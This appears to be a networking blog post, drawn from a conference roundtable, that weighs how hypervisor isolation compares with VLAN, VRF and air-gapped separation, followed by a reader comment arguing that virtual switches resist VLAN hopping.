The Hierarchy of Isolation

Friday roundtables are one of the best parts of the Troopers conference – this year we were busy discussing (among other things) how safe the hypervisors are as compared to more traditional network isolation paradigms.

TL&DR summary: If someone manages to break into your virtualized infrastructure, he’ll probably find easier ways to hop around than hypervisor exploits.

There are two obvious potential causes for concern (forgetting for the moment the noisy neighbor challenges) when considering hypervisor security from a networking engineer’s point of view:

  • Improper implementation of inter-VM or network-level isolation (VLAN hopping, anyone?)
  • Exploits of control-plane vulnerabilities – every time there’s a communication channel between the guest and the host, there’s a potential to explore a buggy host implementation (VMware tools, anyone?)

You’re probably familiar with the network-side control-plane vulnerabilities, from denial-of-service attacks triggered by specially crafted packets, to brutally simple things like sending a BPDU packet from a VM. Communication between hypervisor host operating system (or Hyper-V root partition) and guest VMs is no different. For example, it’s pretty easy to burn CPU cycles on a Hyper-V host by sending enormous amounts of IPv6 RA, IPv6 ND or ARP requests, and it may still be possible to crash the hypervisor with invalid function call parameters.

So every time I hear “Hypervisors are not secure enough” I ask “As compared to what?” Hypervisors are obviously less secure than air-gapped networks, but are they less secure than VRFs? I’m not sure.

Some conclusions are evident: if your security policy requires a separate set of physical switches for different security zones, you shouldn’t taint that separation by connecting the same hypervisor host to both zones (claiming multiple NICs result in a good-enough separation is somewhat naïve, as explained in another great post by Brad Hedlund).

On the other hand, if you’re using different VRFs on the same physical switches for different security zones, you probably shouldn’t require separate hypervisor clusters for those same security zones. After all, every host (or VM) residing in those security zones can communicate with the physical switches and try to exploit them.

In the end, there’s no perfect security; it’s all about recognizing threats, evaluating risks and identifying the weakest links. Most security breaches rely on ancient exploits like SQL injections, and operator errors still represent a major source of failures.

Finally, as Rodrigo Branco pointed out during the roundable, an intruder doesn’t need a complex hypervisor exploit to move laterally after the first break-in, there are numerous infinitely easier ways of doing that.

1 comments:

  1. A couple of issues:

    1) From VMware's vSwitch documentation - "VMware virtual switches drop any double-encapsulated frames that a virtual machine attempts to send on a port configured for a specific VLAN. Therefore, they are not vulnerable to this type of attack."

    2) I believe the vSwitches to either equal or better than most physical equipment. They have only employed required technologies and capabilities. A lot of Cisco's issue is the superfluous code that is built in creating a large attack space.

    3) Most hypervisor attacks require extremely complex and often local setups. Given the level of deployment and few if any successful exploits, I would turn the security eye to applications or the false network paradigm of DMZ.

    So I agree with your premise that Hypervisors should be taken off of the skewer and treated as an equal (or better) to the rest of the enterprise.
Add comment
Sidebar